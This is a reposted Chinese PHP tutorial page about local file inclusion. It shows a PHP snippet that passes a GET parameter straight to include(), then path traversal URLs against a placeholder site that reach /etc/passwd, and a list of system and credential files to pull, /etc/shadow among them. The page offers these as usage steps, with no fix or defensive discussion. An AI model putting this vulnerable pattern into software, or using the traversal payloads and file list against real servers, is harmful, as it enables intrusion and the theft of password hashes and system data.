Home > Article > Backend Development > php 伪造本地文件包含漏洞的代码_PHP教程
php 伪造本地文件包含漏洞的代码_PHP教程
- WBOYOriginal
- 2016-07-21 15:23:40914browse
代码:
复制代码 代码如下:
$page=$_GET['page'];
include($page.'php');
?>
你可以这样使用
http://www.xxx.com/index.php?page=../etc/passwd
http://www.xxx.com/index.php?page=../../../etc/passwd
http://www.xxx.com/index.php?page=..../../etc/passwd
获取更多数据:
etc/profile
etc/services
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default
来自hackteach
Statement:
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn
Previous article:PHP+MYSQL会员系统的登陆即权限判断实现代码_PHP教程Next article:php数组函数序列之ksort()对数组的元素键名进行升序排序,保持索引关系_PHP教程
Related articles
See more- round robin weighted round robin algorithm php implementation code
- PHP strip_tags() function to remove HTML, XML and PHP tags from strings
- Introduction to PHP strip_tags() to remove HTML, XML and PHP tags
- PHP removes html tags--detailed explanation of the difference between strip_tags and htmlspecialchars
- PHP strip_tags method to retain multiple HTML tags